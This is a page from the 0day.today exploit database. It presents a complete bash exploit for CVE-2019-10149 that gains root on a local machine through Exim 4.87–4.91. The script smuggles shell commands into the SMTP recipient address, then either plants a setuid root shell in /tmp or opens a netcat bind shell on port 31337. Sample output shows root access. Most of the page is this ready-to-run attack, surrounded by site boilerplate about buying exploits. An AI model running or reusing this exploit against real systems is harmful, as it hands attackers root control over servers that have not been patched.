0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Exim 4.91 Local Privilege Escalation Exploit

Author

Marco Ivaldi

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
# Improper validation of recipient address in deliver_message() 
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return 
# of the WIZard" vulnerability reported by the Qualys Security 
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
  echo "$0 [-m METHOD]"
  echo
  echo "-m setuid : use the setuid payload (default)"
  echo "-m netcat : use the netcat payload"
  echo
  exit 1
}

# payload delivery
function exploit()
{
  # connect to localhost:25
  exec 3<>/dev/tcp/localhost/25

  # deliver the payload
  read -u 3 && echo $REPLY
  echo "helo localhost" >&3
  read -u 3 && echo $REPLY
  echo "mail from:<>" >&3
  read -u 3 && echo $REPLY
  echo "rcpt to:<$PAYLOAD>" >&3
  read -u 3 && echo $REPLY
  echo "data" >&3
  read -u 3 && echo $REPLY
  for i in {1..31}
  do
    echo "Received: $i" >&3
  done
  echo "." >&3
  read -u 3 && echo $REPLY
  echo "quit" >&3
  read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
  case $1 in
    -m) shift; METHOD="$1"; shift;;
    * ) usage
    ;;
  esac
done
if [ -z $METHOD ]; then
  usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

  # prepare a setuid shell helper to circumvent bash checks
  echo "Preparing setuid shell helper..."
  echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
  gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
  if [ $? -ne 0 ]; then
    echo "Problems compiling setuid shell helper, check your gcc."
    echo "Falling back to the /bin/sh method."
    cp /bin/sh /tmp/pwned
  fi
  echo

  # select and deliver the payload
  echo "Delivering $METHOD payload..."
  PAYLOAD=$PAYLOAD_SETUID
  exploit
  echo

  # wait for the magic to happen and spawn our shell
  echo "Waiting 5 seconds..."
  sleep 5
  ls -l /tmp/pwned
  /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

  # select and deliver the payload
  echo "Delivering $METHOD payload..."
  PAYLOAD=$PAYLOAD_NETCAT
  exploit
  echo

  # wait for the magic to happen and spawn our shell
  echo "Waiting 5 seconds..."
  sleep 5
  nc -v 127.0.0.1 31337

# print help
else
  usage
fi

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Exim 4.91 Local Privilege Escalation Exploit

Report Error

Report Error